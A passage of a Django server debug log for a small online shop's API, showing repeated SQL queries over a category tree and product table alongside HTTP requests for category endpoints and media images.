"shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 07:08:20] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [31/Dec/2019 07:08:23] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [31/Dec/2019 07:08:23] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-31 07:08:49,566 utils 2749 140297212245760 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-31 07:08:49,573 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 07:08:49,576 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 07:08:49,578 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 07:08:49,581 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 07:08:49,584 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 07:08:49,586 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 07:08:49,588 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 07:08:49,590 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 07:08:49,593 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 07:08:49,596 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 07:08:49,598 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 07:08:49,600 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 07:08:49,602 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 07:08:49,605 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 07:08:49,607 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 07:08:49,610 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 07:08:49,612 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 07:08:49,614 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 07:08:49,617 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-31 07:08:49,620 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 07:08:49,622 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-31 07:08:49,624 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 07:08:49,626 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 07:08:49,629 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 07:08:49,632 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 07:08:49,634 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 07:08:49,636 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 07:08:49,638 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 07:08:49,641 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 07:08:49,644 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 07:08:49,646 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 07:08:49,648 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 07:08:49,650 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 07:08:49,652 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 07:08:49,656 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 07:08:49,658 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 07:08:49,660 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 07:08:49,662 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 07:08:49,665 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 07:08:49,667 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 07:08:49,669 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 07:08:49,672 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-31 07:08:49,674 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 07:08:49,676 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 07:08:49,679 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 07:08:49] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-31 07:08:49,850 utils 2749 140297212245760 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-31 07:08:49,857 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [31/Dec/2019 07:08:49] "GET /api/v1/categories/6 HTTP/1.0" 200 956 [31/Dec/2019 07:08:50] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 200 600645 [31/Dec/2019 07:08:50] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 200 600645 [31/Dec/2019 07:08:50] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 200 600645 [31/Dec/2019 07:08:50] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 200 784410 [31/Dec/2019 07:08:50] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [31/Dec/2019 07:08:50] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [31/Dec/2019 07:08:53] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [31/Dec/2019 07:08:53] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [31/Dec/2019 07:08:55] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [31/Dec/2019 07:08:56] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [31/Dec/2019 07:08:56] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [31/Dec/2019 07:08:56] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 DEBUG 2019-12-31 07:09:06,422 utils 2749 140297243715328 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-31 07:09:06,426 utils 2749 140297243715328 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [31/Dec/2019 07:09:06] "GET /api/v1/fire/ HTTP/1.0" 200 482 [31/Dec/2019 07:09:06] "GET /media/products/2019/12/05/SampleGIFImage_350kbmb_vsJs0Zd.gif HTTP/1.0" 200 355854 [31/Dec/2019 07:09:06] "GET /media/products/2019/12/06/nathan-dumlao-9m6XwFTWGKs-unsplash.jpg HTTP/1.0" 200 3337046 [31/Dec/2019 07:09:06] "GET /media/products/2019/12/06/monika-grabkowska-zE6fKdd9QLI-unsplash.jpg HTTP/1.0" 200 3039441 [31/Dec/2019 07:10:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 07:11:19,204 utils 2749 140297212245760 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-31 07:11:19,207 utils 2749 140297212245760 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [31/Dec/2019 07:11:19] "GET /api/v1/fire/ HTTP/1.0" 200 482 [31/Dec/2019 07:11:19] "GET /media/products/2019/12/05/SampleGIFImage_350kbmb_vsJs0Zd.gif HTTP/1.0" 200 355854 [31/Dec/2019 07:11:19] "GET /media/products/2019/12/06/monika-grabkowska-zE6fKdd9QLI-unsplash.jpg HTTP/1.0" 200 3039441 [31/Dec/2019 07:11:19] "GET /media/products/2019/12/06/nathan-dumlao-9m6XwFTWGKs-unsplash.jpg HTTP/1.0" 200 3337046 DEBUG 2019-12-31 07:14:57,435 utils 2749 140297243715328 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-31 07:14:57,441 utils 2749 140297243715328 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [31/Dec/2019 07:14:57] "GET /api/v1/fire/ HTTP/1.0" 200 482 [31/Dec/2019 07:14:58] "GET /media/products/2019/12/06/monika-grabkowska-zE6fKdd9QLI-unsplash.jpg HTTP/1.0" 200 3039441 [31/Dec/2019 07:14:58] "GET /media/products/2019/12/05/SampleGIFImage_350kbmb_vsJs0Zd.gif HTTP/1.0" 200 355854 [31/Dec/2019 07:14:58] "GET /media/products/2019/12/06/nathan-dumlao-9m6XwFTWGKs-unsplash.jpg HTTP/1.0" 200 3337046 [31/Dec/2019 07:15:08] "GET / HTTP/1.0" 302 0 [31/Dec/2019 07:20:11] "GET / HTTP/1.0" 302 0 [31/Dec/2019 07:25:14] "GET / HTTP/1.0" 302 0 [31/Dec/2019 07:30:17] "GET / HTTP/1.0" 302 0 [31/Dec/2019 07:35:19] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 07:36:21,929 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-31 07:36:21,934 utils 2749 140297243715328 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [31/Dec/2019 07:36:21] "GET /api/v1/fire/ HTTP/1.0" 200 482 [31/Dec/2019 07:36:22] "GET /media/products/2019/12/05/SampleGIFImage_350kbmb_vsJs0Zd.gif HTTP/1.0" 200 355854 [31/Dec/2019 07:36:22] "GET /media/products/2019/12/06/monika-grabkowska-zE6fKdd9QLI-unsplash.jpg HTTP/1.0" 200 3039441 [31/Dec/2019 07:36:22] "GET /media/products/2019/12/06/nathan-dumlao-9m6XwFTWGKs-unsplash.jpg HTTP/1.0" 200 3337046 DEBUG 2019-12-31 07:36:39,630 utils 2749 140297212245760 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-31 07:36:39,637 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 07:36:39,640 utils 2749 140297212245760 